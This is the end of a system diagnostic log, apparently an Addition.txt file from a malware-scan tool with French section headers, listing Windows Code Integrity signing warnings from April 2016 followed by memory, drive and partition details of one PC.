Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-04-25 16:32:15.917
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-04-24 15:48:32.777
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-04-24 15:48:32.717
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-04-24 13:34:42.504
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-04-24 00:50:01.615
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-04-22 10:08:37.557
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-04-22 10:08:37.462
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-04-19 07:52:50.445
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-04-19 07:52:50.366
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
==================== Infos Mémoire ===========================
Processeur: Intel(R) Core(TM) i5-4210U CPU @ 1.70GHz
Pourcentage de mémoire utilisée: 36%
Mémoire physique - RAM - totale: 8075.26 MB
Mémoire physique - RAM - disponible: 5113.41 MB
Mémoire virtuelle totale: 9355.26 MB
Mémoire virtuelle disponible: 6208.64 MB
==================== Lecteurs ================================
Drive c: (OS) (Fixed) (Total:372.6 GB) (Free:238.91 GB) NTFS ==>[système avec composants d'amorçage (obtenu depuis lecteur)]
Drive d: (Data) (Fixed) (Total:542.8 GB) (Free:277.22 GB) NTFS
==================== MBR & Table des partitions ==================
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 1B8C5F82)
Partition: GPT.
==================== Fin de Addition.txt ============================